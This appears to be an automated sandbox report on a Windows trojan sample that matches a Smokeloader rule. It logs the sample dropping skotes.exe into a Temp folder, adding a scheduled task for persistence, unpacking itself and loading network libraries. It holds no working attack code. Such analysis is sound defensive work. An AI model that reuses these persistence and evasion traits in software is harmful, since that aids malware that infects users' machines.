Source: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: p3aYwXKO5T.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: skotes.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@22/64@0/1

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe

Code function: 0_2_007A00D6 CreateToolhelp32Snapshot,Module32First,

0_2_007A00D6

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe

0_2_0040AA09

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:6700:64:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5196:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess432
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4620
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6700

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: p3aYwXKO5T.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: p3aYwXKO5T.exe

ReversingLabs: Detection: 52%

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe

File read: C:\Users\user\Desktop\p3aYwXKO5T.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\p3aYwXKO5T.exe "C:\Users\user\Desktop\p3aYwXKO5T.exe"
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 724
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 772
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 804
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 856
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 784
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 432 -ip 432
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 904
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 1012
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 1044
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 1140
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 1476
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 476
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 524
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 536
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 720
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 720
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 432 -ip 432	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 1476	Jump to behavior

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Unpacked PE file: 0.2.p3aYwXKO5T.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 21.2.skotes.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 32.2.skotes.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Unpacked PE file: 0.2.p3aYwXKO5T.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 21.2.skotes.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 32.2.skotes.exe.400000.0.unpack

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe

Code function: 0_2_0042BF99 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0042BF99

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_00411359 push es; ret	0_2_0041135A
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_0041D91C push ecx; ret	0_2_0041D92F
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_0041DFC6 push ecx; ret	0_2_0041DFD9
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_007A4210 pushad ; iretd	0_2_007A4211
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_0079F4AC pushad ; retf 0079h	0_2_0079F4AD
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_007BA789 push esi; iretd	0_2_007BA7AC
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_023315C0 push es; ret	0_2_023315C1
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_0233DB83 push ecx; ret	0_2_0233DB96
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_02320F97 push 0044C2D0h; retn 0044h	0_2_02321269
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00411359 push es; ret	21_2_0041135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_0041D91C push ecx; ret	21_2_0041D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_0041DFC6 push ecx; ret	21_2_0041DFD9
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_005B1628 pushad ; iretd	21_2_005B1629
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_005C7BA1 push esi; iretd	21_2_005C7BC4
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_020B15C0 push es; ret	21_2_020B15C1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_020BDB83 push ecx; ret	21_2_020BDB96
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_020A0F97 push 0044C2D0h; retn 0044h	21_2_020A1269
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_0041D91C push ecx; ret	32_2_0041D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_0041DFC6 push ecx; ret	32_2_0041DFD9
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_007A008A pushfd ; iretd	32_2_007A008B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_007A4DB8 pushad ; iretd	32_2_007A4DB9
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_007BB331 push esi; iretd	32_2_007BB354
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_021A15C0 push es; ret	32_2_021A15C1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_021ADB83 push ecx; ret	32_2_021ADB96
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_02190F97 push 0044C2D0h; retn 0044h	32_2_02191269

Source: p3aYwXKO5T.exe	Static PE information: section name: .text entropy: 7.8957690389687345
Source: skotes.exe.0.dr	Static PE information: section name: .text entropy: 7.8957690389687345

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Jump to dropped file

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe

Code function: 0_2_0041C768 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041C768

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
